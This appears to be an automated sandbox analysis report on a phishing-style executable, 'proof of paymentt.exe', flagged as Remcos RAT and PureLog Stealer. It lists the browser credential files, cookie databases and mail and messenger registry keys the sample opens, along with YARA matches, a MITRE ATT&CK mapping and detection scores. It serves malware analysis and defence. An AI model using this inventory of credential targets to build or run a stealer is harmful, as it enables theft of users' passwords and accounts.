Source: proof of paymentt.exe, 00000007.00000002.4458472507.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerB
Source: proof of paymentt.exe, 00000007.00000002.4458987342.000000000134B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manageres }
Source: proof of paymentt.exe, 00000007.00000002.4458667961.0000000001320000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerChrome
Source: proof of paymentt.exe, 00000007.00000002.4458837549.000000000133C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager4D
Source: proof of paymentt.exe, 00000007.00000002.4458987342.000000000134B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerYW\42]
Source: proof of paymentt.exe, 00000007.00000002.4458667961.0000000001320000.00000004.00000020.00020000.00000000.sdmp, proof of paymentt.exe, 00000007.00000002.4458472507.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: proof of paymentt.exe, 00000007.00000002.4458472507.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, logs.dat.7.dr	Binary or memory string: [Program Manager]

Source: C:\Users\user\Desktop\proof of paymentt.exe

Code function: 7_2_10002933 cpuid

7_2_10002933

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: EnumSystemLocalesW,	12_2_00452036
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	12_2_004520C3
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: GetLocaleInfoW,	12_2_00452313
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: EnumSystemLocalesW,	12_2_00448404
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	12_2_0045243C
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: GetLocaleInfoW,	12_2_00452543
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	12_2_00452610
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: GetLocaleInfoA,	12_2_0040F8D1
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: GetLocaleInfoW,	12_2_004488ED
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	12_2_00451CD8
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: EnumSystemLocalesW,	12_2_00451F50
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: EnumSystemLocalesW,	12_2_00451F9B

Source: C:\Users\user\Desktop\proof of paymentt.exe	Queries volume information: C:\Users\user\Desktop\proof of paymentt.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Queries volume information: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\proof of paymentt.exe

Code function: 7_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_10002264

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_0041B60D GetUserNameW,

12_2_0041B60D

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

12_2_00449190

Source: C:\Users\user\Desktop\proof of paymentt.exe

Code function: 16_2_0041739B GetVersionExW,

16_2_0041739B

Source: C:\Users\user\Desktop\proof of paymentt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.proof of paymentt.exe.2c69c0c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.6da0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.2c58f94.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mQpdTSxCjbPop.exe.2f38fa4.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.6da0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mQpdTSxCjbPop.exe.2f38fa4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mQpdTSxCjbPop.exe.2f49c1c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mQpdTSxCjbPop.exe.2f49c1c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mQpdTSxCjbPop.exe.2f08824.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.2c69c0c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.2c58f94.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.2c28814.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2041298477.0000000006DA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2065439154.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2037579032.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Remcos RAT

Source: Yara match	File source: 12.2.mQpdTSxCjbPop.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mQpdTSxCjbPop.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.401a868.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.498ecc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.498ecc8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.401a868.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2044389940.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2038684853.000000000498E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4459314039.0000000002EDF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4458667961.0000000001320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4458472507.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2038684853.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: proof of paymentt.exe PID: 6500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: proof of paymentt.exe PID: 6112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mQpdTSxCjbPop.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

12_2_0040BA12

Contains functionality to steal Firefox passwords or cookies

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		12_2_0040BB30
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: \key3.db		12_2_0040BB30

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\proof of paymentt.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\proof of paymentt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Users\user\Desktop\proof of paymentt.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\proof of paymentt.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\proof of paymentt.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\proof of paymentt.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\proof of paymentt.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\proof of paymentt.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\proof of paymentt.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\proof of paymentt.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\proof of paymentt.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: ESMTPPassword	17_2_004033F0
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	17_2_00402DB3
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	17_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match

File source: Process Memory Space: proof of paymentt.exe PID: 7588, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\Desktop\proof of paymentt.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-F9KCYW			Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-F9KCYW			Jump to behavior

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.proof of paymentt.exe.2c69c0c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.6da0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.2c58f94.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mQpdTSxCjbPop.exe.2f38fa4.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.6da0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mQpdTSxCjbPop.exe.2f38fa4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mQpdTSxCjbPop.exe.2f49c1c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mQpdTSxCjbPop.exe.2f49c1c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mQpdTSxCjbPop.exe.2f08824.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.2c69c0c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.2c58f94.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.2c28814.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2041298477.0000000006DA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2065439154.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2037579032.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Remcos RAT

Source: Yara match	File source: 12.2.mQpdTSxCjbPop.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mQpdTSxCjbPop.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.401a868.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.498ecc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.498ecc8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.401a868.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2044389940.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2038684853.000000000498E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4459314039.0000000002EDF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4458667961.0000000001320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4458472507.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2038684853.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: proof of paymentt.exe PID: 6500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: proof of paymentt.exe PID: 6112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mQpdTSxCjbPop.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: cmd.exe

12_2_0040569A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	12 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 Windows Service	1 Bypass User Account Control	11 Deobfuscate/Decode Files or Information	211 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Access Token Manipulation	4 Obfuscated Files or Information	2 Credentials in Registry	1 System Service Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	1 Registry Run Keys / Startup Folder	1 Windows Service	22 Software Packing	3 Credentials In Files	3 File and Directory Discovery	Distributed Component Object Model	211 Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	222 Process Injection	1 DLL Side-Loading	LSA Secrets	38 System Information Discovery	SSH	3 Clipboard Data	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	1 Bypass User Account Control	Cached Domain Credentials	131 Security Software Discovery	VNC	GUI Input Capture	14 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	1 Masquerading	DCSync	31 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	222 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
proof of paymentt.exe	46%	Virustotal		Browse
proof of paymentt.exe	37%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
proof of paymentt.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	37%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
geoplugin.net	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.imvu.comr	0%	URL Reputation	safe
http://www.imvu.comr	0%	URL Reputation	safe
http://geoplugin.net/json.gp	100%	URL Reputation	phishing
